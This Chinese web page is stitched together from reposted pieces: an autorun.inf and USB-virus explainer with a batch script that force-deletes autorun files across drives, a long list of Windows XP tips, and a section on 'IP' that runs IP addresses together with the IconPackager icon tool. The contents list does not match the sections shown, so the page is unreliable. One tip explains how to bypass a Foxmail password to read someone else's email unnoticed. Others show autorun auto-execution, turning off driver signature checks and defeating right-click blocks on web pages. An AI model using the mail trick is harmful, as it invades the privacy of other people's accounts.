黑客图标.ico_黑客图标大全

文章目录：

• 1、Autorun.inf到底是什么文件名？
• 2、电脑黑客有哪些高明的小技巧?
• 3、什么是IP
• 4、我点任何一个应用程序 该病毒立即在桌面上创建一样的图标包含ico图标
• 5、盘符里总一个删也删不去又不断换名字的EXE文件,是病毒吗?
• 6、为什么黑客能从IP地址进入电脑盗取号码?

Autorun.inf到底是什么文件名？

是一种让磁盘自动运行的文件，现在多被用来重生病毒，也就是U盘病毒。

总说

U盘对病毒的传播要借助autorun.inf文件的帮助，病毒首先把自身复制到u盘，然后创建一个autorun.inf,在你双击u盘时，会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建，那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个，但是不管给autorun.inf设置了什么属性，病毒都会更改它，我提到的方法就是，在根目录下，删除autorun.inf文件，然后，根目下建立一个文件夹，名字就叫autorun.inf，这样一来，因为在同一目录下，同名的文件和文件夹不能共存的原理，病毒就无能为力，创建不了autorun.inf文件了,以后会不会出新病毒，自动去删文件夹，然后再建立文件就不知道了，但至少现阶段，这种方法是非常有效的。

编辑本段现状分析

事实表明，目前已经有新的病毒能够有意识地检测autorun.inf的存在，对于能直接删除的则删之，对于“无法删除”的则用重命名的方式毁之;还有一种很早就出现的以文件名诱骗用户点击的病毒(如：重要文件.exe，小说.exe)。对于以上这两种传播方式的病毒，仅仅建立autorun.inf文件夹是抵御不了的。

编辑本段应对策略

1、在插入U盘时按住键盘shift键直到系统提示“设备可以使用”，然后打开U盘时不要双击打开，也不要用右键菜单的打开选项打开，而要使用资源管理器(开始-所有程序-附件-windows资源管理器)将其打开，或者使用快捷键winkey+E打开资源管理器后，一定通过左侧栏的树形目录打开可移动设备！(要养成这样的良好习惯)

2、如果盘内有来路不明的文件，尤其是文件名比较诱惑人的文件，必须多加小心；需要特别提示的是，不要看到图标是文件夹就理所当然是文件夹，不要看到图标是记事本就理所当然是记事本，伪装图标是病毒惯用伎俩。

编辑本段autorun.inf

autorun.inf文件是从Windows95开始的，最初用在其安装盘里，实现自动安装，以后的各版本都保留了该文件并且部分内容也可用于其他存储设备。

其结构有三个部分：[AutoRun] [AutoRun.Alpha] [DeviceInstall]

[AutoRun]适用于Windows95以上系统与32位以上CD-ROM，必选。

[AutoRun.alpha]适用于基于RISC的计算机光驱，适用系统为Windows NT 4.0，可选。

[DeviceInstall]适用于Windows XP以上系统，可选。

[AutoRun]部分的命令及其详解

1、DefaultIcon

含义：指定应用程序的默认图标。

格式：

DefalutIcon=图标路径名[,序号]

参数：

图标文件名：应用程序的默认图标路径名，格式可以为.ico、.bmp、.exe、.dll。当文件格式为.exe和.dll时，有时需要使用序号来指定图标。

序号：当文件格式为.exe和.dll时，文件可能包括多余一个图标，此时需要使用序号来指定图标，需要注意的是，序号是从0开始的。

备注：

应用程序的默认图标将在windows explorer核心的驱动显示窗口中替代设备的默认图标来显示。

图标路径名的默认目录是设备根目录。

2、Icon

含义：指定设备显示图标。

格式：

Icon=图标路径名[,序号]

参数：

图标文件名：应用程序的默认图标路径名，格式可以为.ico、.bmp、.exe、.dll。当文件格式为.exe和.dll时，有时需要使用序号来指定图标。

序号：当文件格式为.exe和.dll时，文件可能包括多余一个图标，此时需要使用序号来指定图标，需要注意的是，序号是从0开始的。

备注：

设备显示图标将在windows explorer核心的驱动显示窗口中替代设备的默认图标来显示。

图标路径名的默认目录是设备根目录。

当存在应用程序默认图标(DefaultIcon)时，本命令无效。

3、Label

含义：指定设备描述

格式：

Label=描述

参数：

描述：任意文字，可以包括空格。

备注：

设备描述将在windows explorer核心的驱动显示窗口中替代设备的默认描述卷标来显示。

在非windows explorer核心的驱动显示窗口中（例如右击设备选择属性）显示的仍然是设备的卷标。

4、Open

含义：指定设备启用时运行之命令行。

格式：

Open=命令行

(命令行：程序路径名 [参数])

参数：

命令行：自动运行的命令行，必须是.exe、.com、.bat文件，其他格式文件可以使用start.exe打开或使用ShellExecute命令。

备注：

命令行的起始目录是设备根目录和系统的＄Path环境变量。

5、ShellExecute

含义：

指定设备启用时执行文件。（操作系统支持未知）

格式：

ShellExecute=执行文件路径名 [参数]

参数：

执行文件路径名：设备启用时执行文件路径名。可以是任意格式文件。系统会调用设置的程序执行此文件。

参数：参数，根据执行文件作调整

备注：

命令行的起始目录是设备根目录和系统的＄Path环境变量。

6、Shell关键字Command

含义：

定义设备右键菜单执行命令行。

格式：

Shell关键字Command=命令行

(命令行：程序路径名 [参数])

参数：

命令行：自动运行的命令行，必须是.exe、.com、.bat文件，其他格式文件可以使用start.exe打开。

备注：

命令行的起始目录是设备根目录和系统的＄Path环境变量。

7、Shell关键字

含义：定义设备右键菜单文本。

格式：

Shell关键字=文本

参数：

关键字：用以标记菜单，可以使用任何字符表示，包括空格。

文本：在右键菜单中显示的文本。可以使用任何字符，不能存在空格。

备注：

在同一Autorun.inf文件中，不同右键菜单关键字不同，相同右键菜单关键字相同。

右键菜单文本中可以使用设定加速键，输出一个。

Shell关键字Command命令Shell关键字两者缺一不可，顺序无所谓。

当不存在Open、ShellExecute与Shell命令时，设备启用时运行第一个设备右键菜单指定命令。

8、Shell

含义：定义设备启用时运行之设备右键命令。

格式：

Shell=关键字

参数：

关键字：标记过的菜单关键字

备注：

Shell指定的关键字可以在AutoRun.inf文件的任意部分。

OpenShellExecuteShell命令后定义的优先级高。

编辑本段[AutoRun.alpha]部分的命令简介

[AutoRun.alpha]部分的命令与[AutoRun]部分的命令相同，只不过在基于RISC的计算机光驱中，[AutoRun.alpha]优先级高于[AutoRun]

[DeviceInstall]部分命令及其详解

DriverPath

含义：定义搜索驱动程序目录。

格式：

DriverPath=驱动程序路径

参数：

驱动程序路径：驱动程序所在路径，包括其子路径。

备注：

Windows XP以上支持。

仅CD-ROM支持

当系统监测到一个新的设备时，会提示用户寻找设备的驱动程序。当用户点选此CD-ROM时，当[DeviceInstall]部分存在时，系统会按照DriverPath所标记的路径出寻找驱动程序。未标记的路径系统将忽略查找。当[DeviceInstall]部分不存在时，系统将进行完全查找。

如果不希望系统在此CD-ROM中搜索驱动程序，只加一行[DeviceInstall]不加DriverPath命令即可。

系统识别该文件过程如下：

系统在插入U盘的时候会根据这个AUTORUN.INF文件在注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2]下建立一个u盘的关联项,使双击打开指定的程序(如病毒程序)。

Windows 2000/XP下如何删除autorun.inf文件夹在命令提示符中，输入rd (文件夹路径）即可删除文件夹

如文件夹内有内容可把rd替换为deltree来完成删除。

========================================================================

清除autorun病毒的批处理文件代码

u盘插上

首先新建个文本文档，在里面添加以下内容:

@echo on

taskkill /im explorer.exe /f

rem 结束病毒进程(以u.vbe病毒的进程w.exe为例)

taskkill /im w.exe

start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXplorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f

start reg import kill.reg

del c:\autorun.* /f /q /as

del %SYSTEMROOT%\system32\autorun.* /f /q /as

del d:\autorun.* /f /q /as

del e:\autorun.* /f /q /as

del f:\autorun.* /f /q /as

del g:\autorun.* /f /q /as

del h:\autorun.* /f /q /as

del i:\autorun.* /f /q /as

del j:\autorun.* /f /q /as

del k:\autorun.* /f /q /as

del l:\autorun.* /f /q /as

start explorer.exe

=====到这里为止(这行不用复制)==========================

其次打开我的电脑，在菜单栏里选择“工具-文件夹选项-查看”，将“隐藏已知文件类型的扩展名”前面的勾去掉-确定-退出窗口。

再次将刚才新建的那个文件文档的文件名，由“新建文本文档.txt”改为“u.vbe病毒消除.bat”。

最后直接双击它就能清除这个病毒了!

【另外】对于杀毒软件长生的此类文件夹（如超级巡警），可用DOS命令快速干净的删除，方法如下

假设autorun.inf文件夹是在D盘，操作如下： 打开“开始”，选择“运行”，输入“CMD”，打开命令行窗口，在命令行窗口中输入一下命令：

第一步：输入D: 然后回车

第二步：输入rmdir /s autorun.inf 然后回车

第三步：当出现提示时，按“Y”，并回车

其他盘照此方法执行即可！！

电脑黑客有哪些高明的小技巧?

·强人总结的Windows XP实用技巧45条（1）

我综合了网上的有关软件应用的小巧和自己的几个，希望对大家有用，如果你有更好的请跟帖子大家共分享!有关注册表修改的，请先备份注册表!

1、 影音文件在xp中无法删除

很多情况下是因为预览功能搞的鬼。开始|运行中输入并执行“REGSVR32 /U SHMEDIA.DLL”，取消息预览。恢复时运行“REGSVR32 SHMEDIA.DLL”。其实就是去掉预览功能。

2、注册表解锁

REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]

"DisableRegistryTools"=dword:00000000

3、 在XP下重装IE:

运行注册表编辑器，找到[HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components]，把键值从1改成0，重启后xp将自动开始安装IE6。

4、 永久不开启3721

Win9x/Me

编辑文件 X:Windowshosts，添加一行代码：

download.3721.com 255.255.255.255

WinNT/2000

编辑文件 X:WINNTsystem32driversetchosts，添加一行代码：

255.255.255.255 download.3721.com

WinXP

编辑文件 X:Windowssystem32driversetchosts，添加一行代码：

255.255.255.255 download.3721.com

对于 CNNIC 的中文域名也可以用，域名改成 cdn2.cnnic.cn

5、任务栏里的显示桌面丢失了怎么办？

简单的方法：

记事本新建输入：

[Shell]

Command=2

IconFile=explorer.exe,3

[Taskbar]

Command=ToggleDesktop

保存为 显示桌面.scf

拖到快速启动

6、WIN98中用快捷方式实现一键关机

每次关闭计算机，都需要执行“开始/关闭计算机”命令，给本来就很简单的关机操作带来了很多麻烦，下面介绍一种实现一键关机的方法。首先需要在桌面的空白处单击鼠标右键，并且新建立一个“快捷方式”，在弹出的创建快捷方式对话窗口中，在“命令行”中输入“C:windowsRUNDLL32.EXE user,ExitWindows”，然后单击“下一步”按钮，给该快捷方式命名为“一键关机”，这时系统的桌面上就会出现刚才建立的快捷方式了，打开该快捷方式的属性窗口，进入“快捷方式”页，并且给该快捷方式自定义一个快捷功能键，如F11，完成以后，就可以按F11键执行关机命令。

7、 将MP3中音质不好的部分去除

修正MP3歌曲可以通过mp3Trim软件来实现。

运行程序之后载入需要修正的MP3歌曲，首先要知道需要截取的是哪一部分，在“从头部”处输入截取部分的开始时间，单击右边的小喇叭按钮，同时在“从尾部”处输入时间(这个时间是从文件末尾往前推的时间，所以此时间需用音乐总的时间减去刚才记下的时间来得到)，单击右边的小喇叭按钮，紧接着选择保存便大功告成了。

除了从时间选择截取片段，mp3Trim支持从帧来选择截取片段，其操作方法与时间截取大同小异，而且其他诸如音量控制、淡入淡出效果等功能也很有特色。

8、 双击窗口左上角的图标可以关闭窗口

如果同时有多个窗口打开，想要关闭的话，可以按住shift不放然后点击窗口右上角的关闭图标。

9、 输入法问题：

1)、解决安装officexp输入法图标问题：

只要把 x:windowssystem(x为安装windows的盘符)文件夹下的ctfmon.exe在dos下删除或改名即可。（用该法操作后第一次启动电脑时，如发现输入法图标不再系统托盘中，可在控制面板的输入法图标中把它找回来）。

2)、找回office2003的输入窗口：

在注册表中[HKEY_CURRENT_USER/Control Panel/Input Method/]下的Show Status值变为0，将其改为1。并重新登陆即可解决问题。

10、 用记事本减肥win2k

进入c:winntinfsysoc.inf在编辑菜单中选替换，在查找中输入“hide,”点击全部替换，在添加删除中可出现一些常见的选项，你可根据自己的需要进行选择。

sfc /purgecache

在运行里输入这个命令回车，可以清理很多缓存和一些备份文件，通常都能去掉300－400M的文件，对系统没有任何伤害，xp通用。

11、 用ghost压缩

随便找一个gho镜像文件，用ghost explorer把文件中的内容删除。用ghost explorer打开空gho文件，并在ghost explorer的窗口里点右键粘贴或是直接把文件拖进窗口就行了（ghost explorer的压缩速度比winrar还要快，而添加、删除等都可以方便实现，用起来就象资源管理器一样）。

12、win2000/XP在遇到系统严重问题无法启动

可以利用故防恢复控制台，把c：windowsrepair文件夹中保存的初始化注册表文件（system、software、sam、security、default)，复制进system32config(先将其同容备份后删除）中来换救系统。

13、手动下载xp升级补丁

许多朋友在装好sp1后通过windows update网上升级后还会发现有许多升级补丁，但是,如果通过windows update网上升级速度奇慢，有什么办法可以加速下载呢？通过实践，我发现一个小窍门。

步骤:

1)：通过开始菜单里的windows update进行上网升级。

2):选择“扫描以寻找更新”查找升级补丁。

3):“复查并安装更新”开始查看更新补丁说明。

4)：点击“立即安装”跳出windows update--网页对话框开始下载补丁

5)：选择取消，退出升级

6)：打开c:windowsWindows Update.log

看见了吧!你所要得补丁下载地址都在这里!现在所要做的就是复制下载链接地址用网际快车(FlashGet)这类的下载软件进行下载。

14、 利用fc和来分析注册表

例如，我们可以在安装软件前份一次注册表（如：c:first.reg），安装后再导出注册表文件（c:second.red）然后再在MS－DOS方式（纯DOS方式也行）下执行下列命令：

c:fc first,reg second.regfc.txt （回车）

再打开fc,txt文件，即可查看该软件对注册表添加了哪些子项了。

注：重定向输入的文件类型一般为.txt形式也可以，如.wps 、.doc等，前提是必须安装相应的文件打开程序。

15、 轻松破解foxmail账户口令

在foxmail中为了账户的安全，我们一般会为账户设置一个口令,如果忘了也不要紧。打开mail目录下以你的帐户命令的文件夹，删除accounf.stg。口令解除了。

不用删除，改个后缀名即可。系统会自动创建一个新的accounf.stg文件，出来后删除此文件，再改回原accounf.stg文件后缀，就能神不知鬼不觉看别人的邮件了。不过最好不要用于非法用途。

16、 局域网隐身法：

在局域网中常通过网上邻居查看局域网中其他用户的在线情况，如果你不希望别的用户知道你是否在线，这时可以在win2000/xp下运行cmd然后再运行net config server /hidden:yes 回车后就隐身啦。如果要取消只要把yes 改成no。

17、 用winrar合并MP3：

把几首要合并的mp3文件选中，右键单击——添加到档案文件，压缩方式选择存储。然后把压缩好的文件后缀改成mp3。再放一下听听是不是两首歌已经合成一首啦。

18、 禁用设备驱动更新向导

这个设置可以允许你在设备管理器中禁用通过windows Update升级设备的驱动程序。

要进行这个设置，可以按以下步骤进行操作：在任务栏上点击开始按钮，然后在开始菜单中点击运行，输入regedit并点击确定，打开注册表编辑器。

展开HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindows NTDriver Signing

创建一个名为“NoDevMgrUpdate”的DWORD 键，然后设置键值为“1”。你修改的设置会在你重启动电脑后生效。

19、改变驱动签名验证选项

这个设置可以让你决定在安装未经过签名或者测试的驱动程序时系统采取怎样的操作。要进行这个设置，可以按照以下步骤进行操作：在任务栏上点击开始按钮，然后在开始菜单中点击运行，输入regedit并点击确定，打开注册表编辑器。展开HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindows NTDriver Signing 创建一个名为“BehaviorOnFailedVerify”的DWORD 键，设置键值为“0”。你修改的设置会在你重启动电脑后生效。

20、卸载传真和图片查看器

如果不想用XP自带的传真和图片查看器，你可以运行这个命令卸载它：

regsvr32 /u shimgvw.dll

21、 禁止officexp输入条

先在添加/删除程序里把《中文可选输入方法》禁用，然后在区域设置详细信息将除“英语（美国）”之外的其它输入法删除，最后运行：

regsvr32 /u msimtf.dll

regsvr32 /u msctf.dll

22、 豪杰超级解霸V8

只要将安装目录中的VCvtShell.dll改名就可以去掉资源管理器中的按钮。

23、系统是2K或xp，如果你的系统分区是fat32格式，如果非法关机，下次启动的时候系统会运行磁盘扫描程序，但是启动的时候总是会有10秒钟的等待时间，如何去掉呢？

只要一个命令即可：

CHKNTFS /t:0

上面的0是等待秒数。

24、2k系统老是提示“无法装载动态链接库***.dll，系统找不到指定文件”。

把该文件copy到原路径也没用，这时你可以试试dos下的这个命令来修复系统文件：

sfc /scanonce

如果需要的话会提示插入2k光盘，然后重启就应该可以。

25、 MyIE2里怎么改google搜索

MYIE2设置中心快捷搜索*是默认搜索，最新"简体"中文搜索是 ... 2lr=lang_zh-CN。

26、 不用重新启动都可以应用修改后的注册表

修改注册表后，保存对注册表的修改。然后同时按下“Ctrl+Alt+Del”组合键，在弹出的Windows任务列表，加亮“Explore”，单击“结束任务”，显示关机屏幕，单击“否”，稍候，弹出错误信息，单击“结束任务”，Windows浏览器即会和新的注册表一起重新装载。

27、QQ自己加自己的方法：

在黑名单中加自己，然后再把自己拖到我的好友中就可以了,然后再运行注册向导。

28、启动Winamp，并播放一首MP3，然后按住[SHIFT]不放，再单击面板上的“停止”按钮，你会发现音乐没有立即停止，而是逐渐降低音量直至完全消失，就象电台DJ做的一样。

29、原来硬盘图标也可以这么漂亮啊！

首先你得在网上下载几个你喜欢的图标(后缀名为.ico)，分别放入每个驱动器的根目录下面，命名为如1.ico,然后新建一记事本，输入:

[autorun]

icon=1.ico

然后保存为autorun.inf就可以了，重启系统就能看到效果了！另外最好把这两个文件的属性设置为"隐藏"，主要是因为如果不这样做的话，你打开每个驱动器都可以看见这么两个文件，太丑了，而且也使我们把硬盘图标变漂亮的秘密给暴露了！

而且这一招还可以应用到光盘上，在你刻录的光盘上也加入一个autorun.inf文件和一个图标，那么你的光盘也会有这样的一个图标！

另外，把autorun.inf的内容改成：

[autorun]

open=xxx.exe

插入光盘时便会自动运行xxx.exe这个文件，这一招也很实用！

30、 RealOne Player是一个非常优秀的音视频播放软件，美中不足的是启动时间比较长，那我们何不想点办法来加快RealOne Player的启动速度呢？

1)．无声地启动

执行“开始→搜索→文件或文件夹”命令，分别查找“netid.smi”和“getmedia.ini”文件，找到后将它们更名，比如更名为“netid-old.smi”和“getmedia-old.ini”，此后当你再次启动RealOne Player时，就不会再有欢迎音乐，软件也不会再尝试连接软件主页了。

2)．省略软件简介

在“Tools→Album info”中选中“Hide”项，则以后RealOne Player就不再显示产品简介了。

3)．关闭媒体浏览器

RealOne Player提供了一个媒体浏览器，关闭它的方法是：在RealOne Player窗口右上角“关闭”按钮的下面，“地球”按钮的右面，找到一个三角箭头，单击这个箭头打开其下拉菜单，取消“show media browser”项前的勾即可

再次启动RealOne Player，感觉速度是不是快了许多？

31、让中文文件名按笔画排序

在Windows的资源管理器中，不管文件（或文件夹）名是英文还是中文，当我们用“详细信息”方式查看时，在文件列表标题“名称”上单击，文件名默认的排序方式都是按字母的顺序排列的。如果你有大量的中文文件名，那么让中文文件名按笔画排序会更符合我们的使用习惯。方法是：

在Windows XP中双击“控制面板→区域和语言选项”，切换到“区域选项”选项卡，单击“自定义”按钮打开“自定义区域选项”对话框，单击“排序”选项卡，在排序方法下拉列表中选择“笔画”。重新启动计算机后，打开资源管理器，单击文件列表标题“名称”，会发现中文文件名已经按笔画多少排序了！

注意：该设置只影响中文名称文件，不管以“发音”还是以“笔画”排序，用英文命名的文件，其排序方式总是按名称排序。

32、 巧破网页禁用鼠标右键。

巧破网页禁用鼠标右键

第一种情况，出现版权信息类的。破解方法如下：

在页面目标上按下鼠标右键，弹出限制窗口，这时不要松开右键，将鼠标指针移到窗口的“确定”按钮上，同时按下左键。现在松开鼠标左键，限制窗口被关闭了，再将鼠标移到目标上松开鼠标右键，哈哈，弹出了鼠标右键菜单，限制取消了！

第二种情况，出现“添加到收藏夹”的。破解方法如下：

在目标上点鼠标右键，出现添加到收藏夹的窗口，这时不要松开右键，也不要移动鼠标，而是使用键盘的TAB键，移动焦点到取消按钮上，按下空格键，这时窗口就消失了，松开右键后，我们熟悉的右键菜单又出现了。

第三种情况，超链接无法用鼠标右键弹出“在新窗口中打开”菜单的。这时用上面的两种方法无法破解，看看我这一招：在超链接上点鼠标右键，弹出窗口，这时不要松开右键，按键盘上的空格键，窗口消失了，这时松开右键，可爱的右键菜单又出现了，选择其中的“在新窗口中打开”就可以了。

上面的方法你全都知道？那再看下面的你知道不知道？在浏览器中点击“查看”菜单上的“源文件”命令，这样就可以看到html源代码了。不过如果网页使用了框架，你就只能看到框架页面的代码，此方法就不灵了，别急，我还有别的办法。

你按键盘上的Shift+F10组合键试试，可以直接调出右键菜单!

再看我这一招：看见键盘右Ctrl键左边的那个键了吗？按一下试试，右键菜单直接出现了！这一招在江湖上可是很少见到的，如何？还不行吗？

看来必须使出我的独门绝招了！要看仔细了，这可是江湖上从来没有出现过的“无敌****”哦！在屏蔽鼠标右键的页面中点右键，出现限制窗口，此时不要松开右键，用左手按键盘上的ALT+F4组合键，这时窗口就被我们关闭了，松开鼠标右键，菜单出现了！这一招一使出来，以上所有情况都可轻易破解掉。

33、 键盘“Print Screen”键的妙用四则

1、代替屏幕截图软件

按下Print Screen键，将会截取全屏幕画面。用鼠标点击“开始→程序→附件→画图”，将会打开“画图”程序，点击该窗口中的“编辑→粘贴”菜单，这时会弹出一个“剪贴板中的图像比位图大，是否扩大位图？”对话框，点击“是”，就会将该截取的图片粘贴到其中。再按下Ctrl+S键将图片保存即可。

2、抓取当前活动窗口

在使用Print Screen进行屏幕抓图时，同时按下Alt键，就会只抓取当前活动窗口，然后按上述方法保存即可。

3、截取游戏画面

我们都知道用键盘上的Print Screen键可以抓取系统中的桌面图案，然后在“画图”程序或是Photoshop之类的图像处理软件中可以“粘贴”出来。但是如果我们要抓的是游戏画面的话，上面这个方法可能就不灵光了。

没关系，启动Windows Media Player(6.0以上版本)，打开一个视频文件，选择“文件→属性→高级”，双击Video Renderer，在Direct Draw中，把YUV Flipping、RGB Flipping、YUV Overlaya和RGB Overlays四个选项取消，确定后退出。再试试看，用Print Screen键也可以抓游戏画面了。

4、截取DirectX图

Print Screen键无法截取DirectX图，没关系，只要我们略施小计，就可以让它大展拳脚。在“开始”菜单的“运行”中输入regedit，打开注册表编辑器，然后展开注册表到HKEY_Local_MachineSoftwareMicrosoftDirectDraw分支，新建一个“DWORD”值，并将其重命名为“EnablePrintScreen”，填入键值“1”，即可使Print Screen键具有截取DirectX图的功能。

35、快捷使用你的软件

在桌面上找到你最常用的软件的图标，点右键－属性，将快捷方式选项更改为你认为最合适的，比如我的myie2是F9,winamp是F10，QQ是F11，再在myie外部工具栏里添加你上网常用的软件，这样我开机时只要按F9、F10、F11，我三个最常用的软件就很快打开了，但是最好不要将快捷键设置与系统常用的相同，一般设置时会提示的！

36、用下载软件查看隐藏分区

操作系统：WINDOWS XP

分区格式：FAT32

下载软件：网际快车、影音传送带、迅雷、BT精灵

隐藏分区软件：优化大师或是通过修改注册表，原理是一样的，具体的不再详细说明。本人是用优化大师的优化功能隐藏了h盘。

情况一：下载工具中有H盘软件或文件的下载记录。 比如曾经用上面的任何一个下载工具下载了QQ在H盘，记录未删除。此时选择这个记录，以快车为例，任务-打开下载的文件目录，你会发现隐藏的H盘被打开，里面的文件可以进行操作了!呵呵!

情况二：下载工具中无隐藏分区的相关文件下载记录或无任何记录，而你怀疑或是知道隐藏了某个分区(比如我们现在知道我的电脑上隐藏了H盘)，此时任意找到一个下载链接，以快车为例，用快车下载，保存在H盘任意一文件夹下，不一定要下载完毕，然后任务-打开下载的文件目录，H盘就被打开了，当然前提是确实隐藏了H盘。

37、WinXP自带批量重命名功能

只要选中一堆文件，选重命名，然后改第一个文件，改完后，其他文件也会自动修改。

38、 改变win98录音机的录音长度限制

1).打开录音机，安下“录音”按钮，这时在录音窗口右侧显示本次录音的长度为60秒，左侧显示本次录音的位置。

2).待录音进行到一定的位置后，按下“停止”按钮。

3).打开“效果”菜单，选择“减速”，这时你会发现录音窗口右面显示长度为100秒。不断重复操作，直到录音长度增加到合适长度。

4).按“收索到开头”按钮，然后再按“录音”开始正式录音，这时候录音的长度就不是一分钟了！

39、 Word文档加密小技巧

文件菜单设置：1、打开需要加密的Word文档。2、选“文件”的“另存为”，出现“另存为”对话框，在“工具”中选“常规选项”，出现“保存”选项卡。3、分别在“打开权限密码”和“修改权限密码”中输入密码（这两种密码可以相同也可以不同）。4、再次确认“打开权限密码”和“修改权限密码”。按“确定”退出“保存”选项卡。5、文件存盘。

由工具菜单设置：1、打开需要加密的Word文档。2、选“工具”菜单的“选项”命令，出现“选项对话框”。3、在“选项”对话框中选“保存”选项卡。4、分别在“打开权限密码”和“修改权限密码”中输入密码，点“确定”退出。5、将文件保存。

对模板加密

如果我们不想别人使用Word提供的通用模板（Narmal.dot）或自己精心创作的一个模板，可以对该模板进行加密，其方法是：1、打开通用模板文件（文件名是Narmal.dot，通常可以在C：＼ProgramFiles＼Mi－crosoft＼Templetas文件夹中找到）。2、按上面的两种方法设置密码。3、点“工具栏”中的保存（或选“文件”菜单的“保存”）。以后每次启动Word时，就会提示你输入密码。

40、如何输入汉语拼音中的音调符号（如：ā、ě、ū、ǔ、ü、á等)

方法一：word软件中，单击“插入”/“符号”在弹出的“符号”对话框的“子集”框中选择“拉丁语扩展-A”然后在中间的大框中选择想要的符号，单击对话框下面的“插入”，再单击“关闭”。

方法二：在“智能ABC输入法”中文输入状态，输入“V8”，然后在列表中选择即可。（顺便说一下，当在“智能ABC输入法”中文输入状态，输入“V”+“一个0-9的数字”，如“V1”、“V2”…，你会发现许多令人吃惊的玩意。

41、删除“运行”中的历史记录

选择“开始”菜单中的“关闭系统”命令，然后在弹出的对话框中选择“否”返回Windows，再看看“运行”中的历史记录是不是都消除了呢？

42、 让“我的电脑”高高在上

默认情况下，在资源管理器中，Windows XP会把“我的文档”图标放在“我的电脑”图标上面。这种排列顺序让很多人在使用中感到很不适应。通过修改注册表，我们可以让“我的电脑”图标“跑”到“我的文档”图标之上，其操作方法是：

单击“开始→运行”，键入“Regedit”后回车，打开注册表编辑器，依次展开[HKEY_CLASSES_ROOTCLSID\]分支，双击右侧窗口中名为“SortOrderIndex”的DWORD值，将它的值由“48”改为“54”即可。

43、彻底删除“我的文档”

在Windows XP中，当我们删除“我的文档”中的“我的音乐”、“图片收藏”等文件夹后，重新启动计算机后又会产生这几个文件夹。其实，要想彻底删除“我的音乐”、“图片收藏”等文件夹，我们只要先在Windows“运行”对话框中输入“Regsvr32 /u mydocs.dll”这个命令，然后就可以彻底删除它们。

44、 禁止任务栏保存修改

在日常的教学过程中，经常发现学生有意无意地修改任务栏的属性。造成下次上机时任务栏、时间图标等信息不能正常显示。通过对注册表的修改可以让系统对所作修改不进行保存，当重新启动后，系统自动恢复到原来的设置。

单击“开始→运行”，键入“Regedit”后回车，打开注册表编辑器，依次展开[HKEY_CURRENT_USERsoftwareMicrosoftWindowscurrentversion

policiesExplorer]分支，在右侧窗口中单击鼠标右键，选择“新建→DWORD值”命令，新建一个名为“nosavesettings”的DWORD值，并将其值设置为“1”即可。

45、巧借Windows XP文件加速启动Windows 2000

大家一定感觉Windows XP的启动速明显比2000的快很多，这是因为它对主要启动文件NTDETECT.COM和NFLDR（此文件没扩展名，两个文件都在系统分区根目录下）作了优化，我们只要在相应语言版本的Windows XP系统下复制这两个文件至Windows 2000系统分区根目录下覆盖原文件即可。

什么是IP

一、IP地址的概念

我们知道因特网是全世界范围内的计算机联为一体而构成的通信网络的总称。联在某个网络上的两台计算机之间在相互通信时，在它们所传送的数据包里都会含有某些附加信息，这些附加信息就是发送数据的计算机的地址和接受数据的计算机的地址。象这样，人们为了通信的方便给每一台计算机都事先分配一个类似我们日常生活中的电话号码一样的标识地址，该标识地址就是我们今天所要介绍的IP地址。根据TCP/IP协议规定，IP地址是由32位二进制数组成，而且在INTERNET范围内是唯一的。例如，某台联在因特网上的计算机的IP地址为：

11010010 01001001 10001100 00000010

很明显，这些数字对于人来说不太好记忆。人们为了方便记忆，就将组成计算机的IP地址的32位二进制分成四段，每段8位，中间用小数点隔开，然后将每八位二进制转换成十进制数，这样上述计算机的IP地址就变成了：210.73.140.2。

二。IP文件

ip是Windows主题文件

很多XP桌面主题包里所带的图标集都会加入IconPackager图标主题定义文件，能够用IconPackager打开，很方便地一次性替换所有图标。这种替换方式对系统没有任何影响，实际上只是在Windows的图标缓存中进行替换，随时可以恢复。下面就简单介绍IconPackager以及它的图标主题的用法。为了方便，下面简称 IconPackager 为 IP。

先做个名词解释：

.icl 文件：ICon Library （图标库）的简称，一种使用图标编辑软件（例如Microangelo）制作的16位Windows DLL库文件，只不过后缀名不同而已，专用于图标的打包使用，里面除了图标什么都没有，优点是能够将大量图标压缩成一个文件便于使用和交流，而且不需要解包就可以直接使用里面的图标。Windows XP 默认就支持这种图标库格式。IP 格式的图标主题有两种发布方式，第一种也是最常见的方式是 图标 + .iptheme 定义文件 的形式，这种形式发布的图标主题一般都在一个单独的目录中，图标可能是一大堆 .ico文件，也可能是单个的 .icl （上面解释啦）图标库文件，还有一个最重要的 .iptheme 文件。不得不再做一个名词解释啦。

.iptheme 是IP专用的图标主题定义文件，就像第2节里说的 .theme 主题文件一样，也是文本格式，可以用任何文本编辑器打开，它的内容一看就懂。[Software Info] 部分是IP软件的说明，不用管它，下面的 [Package Info] 就是图标内容的定义了，例如：My Computer=%ThemeDir%02.ico 意思是"我的电脑"的图标定义为图标主题目录下的 02.ico 文件，前面是系统中某个显示图标的位置，后面是具体定义的图标文件。也可能是：My Computer=%ThemeDir%01.icl,1 ，这样的定义指向的就是一个 .icl 图标库文件，在逗号后面跟的数字1就是指图标库文件中的第一个图标。

如果你的系统中安装了IP，只要双击 .iptheme 文件IP就会自动启动然后打开这个图标主题，再点击IP窗口左边的"Icons Cursors"，就可以在右边看到该图标主题内定义的各种具体图标了，分为桌面、开始菜单、文件夹、驱动器、其他、文件类型、鼠标指针、快速启动栏等八个类，基本涵盖了Windows中所有的图标，甚至是很多第三方软件的文件格式一样找得到。对于不满意的图标，双击图标项就可以更改，或者选中图标项之后点击右边的Change... ，找到想要的图标确认就会在IP中载入了。点击右下方的 Apply 即可应用当前的图标主题，稍等几秒系统的图标主题就替换完成了。所替换图标的多少由图标主题中包含的图标多少来决定，如果图标主题图标类型很全的话，基本上整个系统内的图标变得都会让你认不出来了。要注意的是在IP中图标定义是绝对路径，也就是说IP中定义好的图标一旦.ico 文件或者 .icl 文件被移动了，在IP中就无效了。

